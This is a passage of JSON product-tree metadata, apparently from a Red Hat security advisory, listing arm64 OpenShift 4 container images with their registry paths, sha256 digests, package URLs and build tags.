"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1ca76b4d5aa455cef111e3ea31cc16eafe26a6c3ed6a9f4111e66e2088a5b3de_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1ca76b4d5aa455cef111e3ea31cc16eafe26a6c3ed6a9f4111e66e2088a5b3de_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1ca76b4d5aa455cef111e3ea31cc16eafe26a6c3ed6a9f4111e66e2088a5b3de_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3A1ca76b4d5aa455cef111e3ea31cc16eafe26a6c3ed6a9f4111e66e2088a5b3de?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849291"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a4de71b4f22f9f5f46300ff38cfda0e4b5647f286fd5bd365d9e0a6cadd94d5d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a4de71b4f22f9f5f46300ff38cfda0e4b5647f286fd5bd365d9e0a6cadd94d5d_arm64",
"product_id": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a4de71b4f22f9f5f46300ff38cfda0e4b5647f286fd5bd365d9e0a6cadd94d5d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-karpenter-provider-aws-rhel9@sha256%3Aa4de71b4f22f9f5f46300ff38cfda0e4b5647f286fd5bd365d9e0a6cadd94d5d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849087"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:edcabf99710bd0952e329b0edab7b7a86b93f9d34dfe17d3391c9405210f63dd_arm64",
"product": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:edcabf99710bd0952e329b0edab7b7a86b93f9d34dfe17d3391c9405210f63dd_arm64",
"product_id": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:edcabf99710bd0952e329b0edab7b7a86b93f9d34dfe17d3391c9405210f63dd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-kms-encryption-provider-rhel9@sha256%3Aedcabf99710bd0952e329b0edab7b7a86b93f9d34dfe17d3391c9405210f63dd?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846847"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:9d0697a33547102399cbeb0a60f9ebfb2a2eb4d3c0e15efba177a96dd27e60f8_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:9d0697a33547102399cbeb0a60f9ebfb2a2eb4d3c0e15efba177a96dd27e60f8_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:9d0697a33547102399cbeb0a60f9ebfb2a2eb4d3c0e15efba177a96dd27e60f8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-file-csi-driver-rhel9@sha256%3A9d0697a33547102399cbeb0a60f9ebfb2a2eb4d3c0e15efba177a96dd27e60f8?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845750"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:2d622f4dbba3bd91a020a734dc0d8c632e58d56373cae44c4af79cbc81a37cd4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:2d622f4dbba3bd91a020a734dc0d8c632e58d56373cae44c4af79cbc81a37cd4_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:2d622f4dbba3bd91a020a734dc0d8c632e58d56373cae44c4af79cbc81a37cd4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-file-csi-driver-operator-rhel9@sha256%3A2d622f4dbba3bd91a020a734dc0d8c632e58d56373cae44c4af79cbc81a37cd4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844614"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:52e53301f201de393f91cf3084e814e35fe6f93f0432969fd4c511c2ac51b911_arm64",
"product": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:52e53301f201de393f91cf3084e814e35fe6f93f0432969fd4c511c2ac51b911_arm64",
"product_id": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:52e53301f201de393f91cf3084e814e35fe6f93f0432969fd4c511c2ac51b911_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-kms-encryption-provider-rhel9@sha256%3A52e53301f201de393f91cf3084e814e35fe6f93f0432969fd4c511c2ac51b911?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844452"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:5cc05e80c48b83737bcd3f4622e0eedaed7baf06024c23753ca77ffc11b9b306_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:5cc05e80c48b83737bcd3f4622e0eedaed7baf06024c23753ca77ffc11b9b306_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:5cc05e80c48b83737bcd3f4622e0eedaed7baf06024c23753ca77ffc11b9b306_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-machine-controllers-rhel9@sha256%3A5cc05e80c48b83737bcd3f4622e0eedaed7baf06024c23753ca77ffc11b9b306?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844519"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:4d0e4a3e50a3bac437c4960c0a079d2148fb8dab6655a761b1d10a1c653633b1_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:4d0e4a3e50a3bac437c4960c0a079d2148fb8dab6655a761b1d10a1c653633b1_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:4d0e4a3e50a3bac437c4960c0a079d2148fb8dab6655a761b1d10a1c653633b1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3A4d0e4a3e50a3bac437c4960c0a079d2148fb8dab6655a761b1d10a1c653633b1?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848375"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:d8fcb99e70b38b22fe131df90326e000e0cda91f206468ad06d4e8ebecc323a0_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:d8fcb99e70b38b22fe131df90326e000e0cda91f206468ad06d4e8ebecc323a0_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:d8fcb99e70b38b22fe131df90326e000e0cda91f206468ad06d4e8ebecc323a0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3Ad8fcb99e70b38b22fe131df90326e000e0cda91f206468ad06d4e8ebecc323a0?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:eddd9cd258d32f1743547c9d8f5fe46e91365511c5c49cfefe626e8d546790cb_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:eddd9cd258d32f1743547c9d8f5fe46e91365511c5c49cfefe626e8d546790cb_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:eddd9cd258d32f1743547c9d8f5fe46e91365511c5c49cfefe626e8d546790cb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3Aeddd9cd258d32f1743547c9d8f5fe46e91365511c5c49cfefe626e8d546790cb?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846727"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:2561fb021083a53e1a38cb951c2f64dff98bb327ba85e8423668ac01f86b9422_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:2561fb021083a53e1a38cb951c2f64dff98bb327ba85e8423668ac01f86b9422_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:2561fb021083a53e1a38cb951c2f64dff98bb327ba85e8423668ac01f86b9422_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3A2561fb021083a53e1a38cb951c2f64dff98bb327ba85e8423668ac01f86b9422?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:5a07998a9b00be6bb0dadefe6bd58399101ee349ac7e4438bbb52401f0e6d9ad_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:5a07998a9b00be6bb0dadefe6bd58399101ee349ac7e4438bbb52401f0e6d9ad_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:5a07998a9b00be6bb0dadefe6bd58399101ee349ac7e4438bbb52401f0e6d9ad_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3A5a07998a9b00be6bb0dadefe6bd58399101ee349ac7e4438bbb52401f0e6d9ad?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844901"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:bb4acaac924d3e5b90306927a9d1e848c656f2a3e3572f59c163cbdab2f96980_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:bb4acaac924d3e5b90306927a9d1e848c656f2a3e3572f59c163cbdab2f96980_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:bb4acaac924d3e5b90306927a9d1e848c656f2a3e3572f59c163cbdab2f96980_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-policy-controller-rhel9@sha256%3Abb4acaac924d3e5b90306927a9d1e848c656f2a3e3572f59c163cbdab2f96980?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846560"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7d76c0f6f94b38c24f37c80c88f4c343792a63765d741c3c8c6c930cdb949349_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7d76c0f6f94b38c24f37c80c88f4c343792a63765d741c3c8c6c930cdb949349_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7d76c0f6f94b38c24f37c80c88f4c343792a63765d741c3c8c6c930cdb949349_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-storage-rhel9-operator@sha256%3A7d76c0f6f94b38c24f37c80c88f4c343792a63765d741c3c8c6c930cdb949349?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846629"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:2bd38ca9b26cfa801fa8953d3498ddeada823e50f421f9061dbbf1ba77d72d18_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:2bd38ca9b26cfa801fa8953d3498ddeada823e50f421f9061dbbf1ba77d72d18_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:2bd38ca9b26cfa801fa8953d3498ddeada823e50f421f9061dbbf1ba77d72d18_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-version-rhel9-operator@sha256%3A2bd38ca9b26cfa801fa8953d3498ddeada823e50f421f9061dbbf1ba77d72d18?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845313"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c0936e2cd743f59b3b7d49c8a915503f06721578ad44f3884f547278637eb83e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c0936e2cd743f59b3b7d49c8a915503f06721578ad44f3884f547278637eb83e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c0936e2cd743f59b3b7d49c8a915503f06721578ad44f3884f547278637eb83e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-configmap-reloader-rhel9@sha256%3Ac0936e2cd743f59b3b7d49c8a915503f06721578ad44f3884f547278637eb83e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848132"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:6d6bbab810dd6cf82997f98c6eb27474c2f28ee6139d254e163045ae881ebca3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:6d6bbab810dd6cf82997f98c6eb27474c2f28ee6139d254e163045ae881ebca3_arm64",
"product_id": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:6d6bbab810dd6cf82997f98c6eb27474c2f28ee6139d254e163045ae881ebca3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/container-networking-plugins-microshift-rhel9@sha256%3A6d6bbab810dd6cf82997f98c6eb27474c2f28ee6139d254e163045ae881ebca3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847815"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:26d93d9c3f7d1062352b9a3c8fc310493b82a992fbaee507f2acd89a25af9817_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:26d93d9c3f7d1062352b9a3c8fc310493b82a992fbaee507f2acd89a25af9817_arm64",
"product_id": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:26d93d9c3f7d1062352b9a3c8fc310493b82a992fbaee507f2acd89a25af9817_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-coredns-rhel9@sha256%3A26d93d9c3f7d1062352b9a3c8fc310493b82a992fbaee507f2acd89a25af9817?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846419"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1dfaae34d94c83c0980ad92ab74ee4e60b727a7bdb6e671dc5a99b907bb33ddd_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1dfaae34d94c83c0980ad92ab74ee4e60b727a7bdb6e671dc5a99b907bb33ddd_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1dfaae34d94c83c0980ad92ab74ee4e60b727a7bdb6e671dc5a99b907bb33ddd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-attacher-rhel9@sha256%3A1dfaae34d94c83c0980ad92ab74ee4e60b727a7bdb6e671dc5a99b907bb33ddd?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848396"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:f645058a52bda117e49b0dcaddeb6a94d09dc50410cbd1ad976be96d1e1af407_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:f645058a52bda117e49b0dcaddeb6a94d09dc50410cbd1ad976be96d1e1af407_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:f645058a52bda117e49b0dcaddeb6a94d09dc50410cbd1ad976be96d1e1af407_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshot-metadata-rhel9@sha256%3Af645058a52bda117e49b0dcaddeb6a94d09dc50410cbd1ad976be96d1e1af407?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844472"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:e09166e12e41529af8b4097fd30b3b874d7415e0001f3bad5051a6e2c4962cff_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:e09166e12e41529af8b4097fd30b3b874d7415e0001f3bad5051a6e2c4962cff_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:e09166e12e41529af8b4097fd30b3b874d7415e0001f3bad5051a6e2c4962cff_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-livenessprobe-rhel9@sha256%3Ae09166e12e41529af8b4097fd30b3b874d7415e0001f3bad5051a6e2c4962cff?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846717"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:6bb20817f634256d50553f735342581d901334968247da8a6a53173d1205f220_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:6bb20817f634256d50553f735342581d901334968247da8a6a53173d1205f220_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:6bb20817f634256d50553f735342581d901334968247da8a6a53173d1205f220_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-node-driver-registrar-rhel9@sha256%3A6bb20817f634256d50553f735342581d901334968247da8a6a53173d1205f220?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847281"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9bb667960a8f888be2bcee6a24688bb30200990775dce499ad94b0137174609f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9bb667960a8f888be2bcee6a24688bb30200990775dce499ad94b0137174609f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9bb667960a8f888be2bcee6a24688bb30200990775dce499ad94b0137174609f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-provisioner-rhel9@sha256%3A9bb667960a8f888be2bcee6a24688bb30200990775dce499ad94b0137174609f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847115"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c61aadb6f4c72f47bae25eb36b2b392432b9d1c52c25deb6c168689696092d4d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c61aadb6f4c72f47bae25eb36b2b392432b9d1c52c25deb6c168689696092d4d_arm64",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c61aadb6f4c72f47bae25eb36b2b392432b9d1c52c25deb6c168689696092d4d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3Ac61aadb6f4c72f47bae25eb36b2b392432b9d1c52c25deb6c168689696092d4d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773707627"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:db4ea6f06a95e645bdc99ba1e80ce72119a0333c222c8565139a4481715e943a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:db4ea6f06a95e645bdc99ba1e80ce72119a0333c222c8565139a4481715e943a_arm64",
"product_id": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:db4ea6f06a95e645bdc99ba1e80ce72119a0333c222c8565139a4481715e943a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/egress-router-cni-rhel9@sha256%3Adb4ea6f06a95e645bdc99ba1e80ce72119a0333c222c8565139a4481715e943a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848446"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:7fd964ab54bcdea280ba34f98d6d9f7365c4bbda46136e63ee80a19f231e36be_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:7fd964ab54bcdea280ba34f98d6d9f7365c4bbda46136e63ee80a19f231e36be_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:7fd964ab54bcdea280ba34f98d6d9f7365c4bbda46136e63ee80a19f231e36be_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-workload-identity-federation-webhook-rhel9@sha256%3A7fd964ab54bcdea280ba34f98d6d9f7365c4bbda46136e63ee80a19f231e36be?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:69fed0fc9f0b00ca9000d646f22eb727fdabc7de817dbdcbf28c4517c01e472d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:69fed0fc9f0b00ca9000d646f22eb727fdabc7de817dbdcbf28c4517c01e472d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:69fed0fc9f0b00ca9000d646f22eb727fdabc7de817dbdcbf28c4517c01e472d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-proxy-rhel9@sha256%3A69fed0fc9f0b00ca9000d646f22eb727fdabc7de817dbdcbf28c4517c01e472d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846532"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:b51f2f5767746f45c1a3092fe327d65f162b999c0e674764d861f168301b71e6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:b51f2f5767746f45c1a3092fe327d65f162b999c0e674764d861f168301b71e6_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:b51f2f5767746f45c1a3092fe327d65f162b999c0e674764d861f168301b71e6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-alertmanager-rhel9@sha256%3Ab51f2f5767746f45c1a3092fe327d65f162b999c0e674764d861f168301b71e6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847140"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:313bd25c0339ea434c08a438eda7bd5e3323bf0e02934ee4d01eb31af658a07a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:313bd25c0339ea434c08a438eda7bd5e3323bf0e02934ee4d01eb31af658a07a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:313bd25c0339ea434c08a438eda7bd5e3323bf0e02934ee4d01eb31af658a07a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-node-exporter-rhel9@sha256%3A313bd25c0339ea434c08a438eda7bd5e3323bf0e02934ee4d01eb31af658a07a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849423"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:399931f0229e6dd1c8da11cf570db838af5b8113d67e0071e8e7b1fdc59f735c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:399931f0229e6dd1c8da11cf570db838af5b8113d67e0071e8e7b1fdc59f735c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:399931f0229e6dd1c8da11cf570db838af5b8113d67e0071e8e7b1fdc59f735c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9@sha256%3A399931f0229e6dd1c8da11cf570db838af5b8113d67e0071e8e7b1fdc59f735c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848133"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:fff15ac26ca10cbbdd23fcf4510a4b2b69c01de3fce1d70ae016933237e8676e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:fff15ac26ca10cbbdd23fcf4510a4b2b69c01de3fce1d70ae016933237e8676e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:fff15ac26ca10cbbdd23fcf4510a4b2b69c01de3fce1d70ae016933237e8676e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3Afff15ac26ca10cbbdd23fcf4510a4b2b69c01de3fce1d70ae016933237e8676e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:8a558ee0c2898ad2d4af602a4cf7e13d5f4bac6fafc958088ce0af1ad6b23abf_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:8a558ee0c2898ad2d4af602a4cf7e13d5f4bac6fafc958088ce0af1ad6b23abf_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:8a558ee0c2898ad2d4af602a4cf7e13d5f4bac6fafc958088ce0af1ad6b23abf_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-rhel9@sha256%3A8a558ee0c2898ad2d4af602a4cf7e13d5f4bac6fafc958088ce0af1ad6b23abf?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773723092"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:c8c48ba4ef25cf37ddfc8608146b64c4d7d881b15bbe42a1d3390bfc9bec1709_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:c8c48ba4ef25cf37ddfc8608146b64c4d7d881b15bbe42a1d3390bfc9bec1709_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:c8c48ba4ef25cf37ddfc8608146b64c4d7d881b15bbe42a1d3390bfc9bec1709_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-agent-rhel9@sha256%3Ac8c48ba4ef25cf37ddfc8608146b64c4d7d881b15bbe42a1d3390bfc9bec1709?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844500"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e07d700e6f778cf8569cc916351b1eb79ef7abbfb34e556503d276f72a21b0fe_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e07d700e6f778cf8569cc916351b1eb79ef7abbfb34e556503d276f72a21b0fe_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e07d700e6f778cf8569cc916351b1eb79ef7abbfb34e556503d276f72a21b0fe_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-machine-os-downloader-rhel9@sha256%3Ae07d700e6f778cf8569cc916351b1eb79ef7abbfb34e556503d276f72a21b0fe?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844865"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:ddb73dd86afdfb11fd4d2f2ca9323a72e9ab3030026f3bc48238513a3fab8c75_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:ddb73dd86afdfb11fd4d2f2ca9323a72e9ab3030026f3bc48238513a3fab8c75_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:ddb73dd86afdfb11fd4d2f2ca9323a72e9ab3030026f3bc48238513a3fab8c75_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-static-ip-manager-rhel9@sha256%3Addb73dd86afdfb11fd4d2f2ca9323a72e9ab3030026f3bc48238513a3fab8c75?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844616"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:9a37dc47bb380727304270fb8e508f4e2f638ae70a5c90c055d212bf72368488_arm64",
"product": {
